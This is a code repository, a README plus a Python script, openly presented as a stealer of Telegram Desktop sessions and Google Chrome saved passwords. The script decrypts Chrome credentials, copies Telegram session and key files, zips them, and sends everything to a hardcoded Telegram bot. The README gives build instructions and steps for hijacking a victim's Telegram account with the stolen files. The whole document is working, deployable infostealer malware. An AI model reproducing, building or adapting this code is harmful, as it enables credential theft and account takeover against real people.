├── README.md └── tgsend.py /README.md: -------------------------------------------------------------------------------- 1 | # telegram session + chrome passwords stealer 2 | Steals telegram session(without any notifications) and google chrome credentials. Sending via telegram bot. 3 | Definitely works in 2020 with Chrome Version 86.0.4240.75 (Official Build)(the newest on the uploading date: 12.10.2020) and Telegram version 2.4.3.0. 4 | 5 | How to use: 6 | 7 | 1. Install telebot, pywin32, pycryptodome: pip install pytelegrambotapi pywin32 pycryptodome 8 | 2. Change telegram bot token and user_id variables to yours. 9 | 3. Build an exe with pyinstaller or other tool (better in venv to not include useless modules). 10 | 11 | How to use telegram session files: 12 | 13 | 1. Download the same version of official "Telegram Desktop Portable" as you get in your bot in captions of the file or try on the newest if you're lucky one (the stealer works only if versions of your received files are the same as your Telegram client). 14 | 2. Run "Telegram.exe" 1 time until "tdata" folder appears. 15 | 3. Unzip your "tdata.zip" and find in there "tdata" folder. 16 | 4. Replace "tdata" folder in your Telegram Portable folder and all the files with your stealed folder "tdata" and files. 17 | 5. Go back and run "Telegram.exe". 18 | -------------------------------------------------------------------------------- /tgsend.py: -------------------------------------------------------------------------------- 1 | try: 2 | from telebot import TeleBot 3 | import shutil 4 | import json 5 | from base64 import b64decode 6 | from win32crypt import CryptUnprotectData 7 | from Crypto.Cipher import AES 8 | import os 9 | import sqlite3 10 | import win32api 11 | from zipfile import ZipFile 12 | except Exception as e: 13 | print("ERROR importing: " + repr(e)) 14 | pass 15 | 16 | 17 | log_out = 0 # 1 - is on, 0 - is off 18 | 19 | 20 | user_id = 441449437 21 | token = '1192426793:AAHf4BSxdOehAukZp0SOxQMjmSanrkU6Klc' 22 | name_ur_txt = 'pass.txt' 23 | 24 | 25 | bot = TeleBot(token) 26 | pathusr = os.path.expanduser('~') 27 | local = os.getenv("LOCALAPPDATA") 28 | temp = os.path.join(local, "Temp") 29 | ttemp = os.path.join(local, "Temp", "tdata") 30 | #desktop = os.path.join(pathusr, "Desktop\\tdata\\") 31 | paths = ['C:\\', 'D:\\', 'E:\\', 'F:\\', 'G:\\', 'H:\\', 'I:\\', 'J:\\'] 32 | path = os.path.expandvars(r'%LocalAppData%\Google\Chrome\User Data\Local State') 33 | 34 | 35 | def getmasterkey(): 36 | try: 37 | with open(path, encoding="utf-8") as f: 38 | load = json.load(f)["os_crypt"]["encrypted_key"] 39 | master_key = b64decode(load) 40 | master_key = master_key[5:] 41 | master_key = CryptUnprotectData(master_key, None, None, None, 0)[1] 42 | return master_key 43 | except: 44 | print("ERROR: couldn't access the masterkey") 45 | pass 46 | 47 | 48 | def decryption(buff, key): 49 | try: 50 | payload = buff[15:] 51 | iv = buff[3:15] 52 | cipher = AES.new(key, AES.MODE_GCM, iv) 53 | decrypted_pass = cipher.decrypt(payload) 54 | decrypted_pass = decrypted_pass[:-16].decode() 55 | return decrypted_pass 56 | except Exception as e: 57 | print("ERROR in decryption: " + repr(e)) 58 | 59 | 60 | def Chrome(): 61 | text = 'YOUR PASSWORDS\n' 62 | try: 63 | if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data'): 64 | shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data', 65 | os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data2') 66 | conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data2') 67 | cursor = conn.cursor() 68 | cursor.execute('SELECT action_url, username_value, password_value FROM logins') 69 | for result in cursor.fetchall(): 70 | password = result[2] 71 | login = result[1] 72 | url = result[0] 73 | decrypted_pass = decryption(password, getmasterkey()) 74 | text += url + ' | ' + login + ' | ' + decrypted_pass + '\n' 75 | with open(name_ur_txt, "w", encoding="utf-8") as f: 76 | f.write(text) 77 | except Exception as e: 78 | print("ERROR in Chrome() func: " + repr(e)) 79 | pass 80 | 81 | 82 | def finddir(path): 83 | for root, dirs, files in os.walk(path): 84 | for name in dirs: 85 | if name == "Telegram Desktop": 86 | found = os.path.join(root, name) 87 | print("***Checking folder: " + found) 88 | if os.path.exists(found + '\\Telegram.exe'): 89 | print("***OK Telegram Desktop has been found") 90 | return found 91 | else: 92 | print("ERROR: ^ this is not an actual TG folder. Continuing...") 93 | pass 94 | 95 | def getFileProperties(fname): 96 | props = {'FileVersion': None} 97 | try: 98 | # backslash as parm returns dictionary of numeric info corresponding to VS_FIXEDFILEINFO struc 99 | fixedInfo = win32api.GetFileVersionInfo(fname, '\\') 100 | props['FileVersion'] = "%d.%d.%d.%d" % (fixedInfo['FileVersionMS'] / 65536, 101 | fixedInfo['FileVersionMS'] % 65536, fixedInfo['FileVersionLS'] / 65536, 102 | fixedInfo['FileVersionLS'] % 65536) 103 | except Exception as e: 104 | print(repr(e)) 105 | pass 106 | return props 107 | 108 | 109 | def logout_windows(bool): 110 | if bool: 111 | try: 112 | global pathd877 113 | os.system('taskkill /f /im Telegram.exe') 114 | os.remove(pathd877) 115 | except Exception as e: 116 | print("ERROR: Failed to logout: " + repr(e)) 117 | pass 118 | else: 119 | print("***Logout state is 0") 120 | pass 121 | 122 | 123 | def send_txt(): 124 | try: 125 | bot.send_document(user_id, open(name_ur_txt,'rb')) 126 | os.remove(name_ur_txt) 127 | print("***OK Passwords have been sended successfully") 128 | except Exception as e: 129 | print("ERROR in send_txt() func: " + repr(e)) 130 | pass 131 | 132 | 133 | 134 | 135 | def send_session_files(path): 136 | version = getFileProperties(os.path.join(path[:-5],"Telegram.exe"))["FileVersion"] 137 | try: 138 | os.mkdir(ttemp) 139 | print("good") 140 | except: 141 | print("err") 142 | #print(user) 143 | for root, dirs, files in os.walk(path): 144 | for dir in dirs: 145 | if dir[0:15] == "D877F783D5D3EF8": 146 | mapsdir = os.path.join(path, dir) 147 | try: 148 | os.mkdir(os.path.join(ttemp, dir)) 149 | except: 150 | pass 151 | if os.path.exists(os.path.join(root,dir,'maps')): 152 | #print("***OK Matched maps in " + path) 153 | shutil.copy2(os.path.join(mapsdir, 'maps'), (os.path.join(ttemp,dir,"maps"))) 154 | elif dir[0:15] == "A7FDF864FBC10B7": 155 | mapsdir = os.path.join(path, dir) 156 | try: 157 | os.mkdir(os.path.join(ttemp, dir)) 158 | except: 159 | pass 160 | if os.path.exists(os.path.join(root, dir, 'maps')): 161 | #print("***OK Matched maps in " + path) 162 | shutil.copy2(os.path.join(mapsdir, 'maps'), (os.path.join(ttemp, dir, "maps"))) 163 | elif dir[0:15] == "F8806DD0C461824": 164 | mapsdir = os.path.join(path, dir) 165 | try: 166 | os.mkdir(os.path.join(ttemp, dir)) 167 | except: 168 | pass 169 | if os.path.exists(os.path.join(root, dir, 'maps')): 170 | #print("***OK Matched maps in " + path) 171 | shutil.copy2(os.path.join(mapsdir, 'maps'), (os.path.join(ttemp, dir, "maps"))) 172 | # bot.send_document(user_id, open(os.path.join(mapsdir, file), 'rb'), caption=path + "\nVersion: " + user) 173 | for file in files: 174 | if file[0:15] == "D877F783D5D3EF8": 175 | #print("***OK Matched D877F783D5D3EF8 in " + path) 176 | pathd877 = os.path.join(path, file) 177 | shutil.copy2(pathd877,(os.path.join(ttemp,file))) 178 | #bot.send_document(user_id, open(os.path.join(file, pathd877), 'rb'), caption=path + "\nVersion: " + user) 179 | elif file[0:15] == "A7FDF864FBC10B7": 180 | #print("***OK Matched D877F783D5D3EF8 in " + path) 181 | pathd877 = os.path.join(path, file) 182 | shutil.copy2(pathd877,(os.path.join(ttemp,file))) 183 | elif file[0:15] == "F8806DD0C461824": 184 | #print("***OK Matched D877F783D5D3EF8 in " + path) 185 | pathd877 = os.path.join(path, file) 186 | shutil.copy2(pathd877,(os.path.join(ttemp,file))) 187 | elif file == "key_datas": 188 | #print("***OK Matched key_datas in " + path) 189 | pathkey = os.path.join(path, file) 190 | shutil.copy2(pathkey, (os.path.join(ttemp, file))) 191 | #bot.send_document(user_id, open(os.path.join(file, pathkey), 'rb'), caption=path + "\nVersion: " + user) 192 | 193 | with ZipFile(os.path.join(temp,'tdata.zip'), 'w') as zipObj: 194 | # Iterate over all the files in directory 195 | for folderName, subfolders, filenames in os.walk(ttemp): 196 | for filename in filenames: 197 | # create complete filepath of file in directory 198 | filePath = os.path.join(folderName, filename) 199 | # Add file to zip 200 | zipObj.write(filePath) 201 | bot.send_document(user_id, open(os.path.join(temp, 'tdata.zip'), 'rb'), caption=path + "\nVersion: " + version) 202 | 203 | 204 | if os.path.exists(pathusr + '\\AppData\\Roaming\\Telegram Desktop'): 205 | tddir = (pathusr + '\\AppData\\Roaming\\Telegram Desktop\\') 206 | tdata_path = (pathusr + '\\AppData\\Roaming\\Telegram Desktop\\tdata') 207 | print("***OK Default TG folder has been found") 208 | send_session_files(tdata_path) 209 | else: 210 | print("ERROR: Telegram folder is not default. Continuing...") 211 | 212 | 213 | for i in paths: 214 | found = finddir(i) 215 | if found != None and found != (pathusr + '\\AppData\\Roaming\\Telegram Desktop'): 216 | tddir = found 217 | tdata_path = (os.path.join(tddir, "tdata")) 218 | send_session_files(tdata_path) 219 | 220 | 221 | def main(): 222 | try: 223 | Chrome() 224 | bot.send_message(user_id, pathusr) 225 | send_txt() 226 | logout_windows(log_out) 227 | except Exception as e: 228 | print('ERROR: Main function: ' + repr(e)) 229 | pass 230 | 231 | 232 | if __name__ == '__main__': 233 | main() 234 | print("***Finished***") --------------------------------------------------------------------------------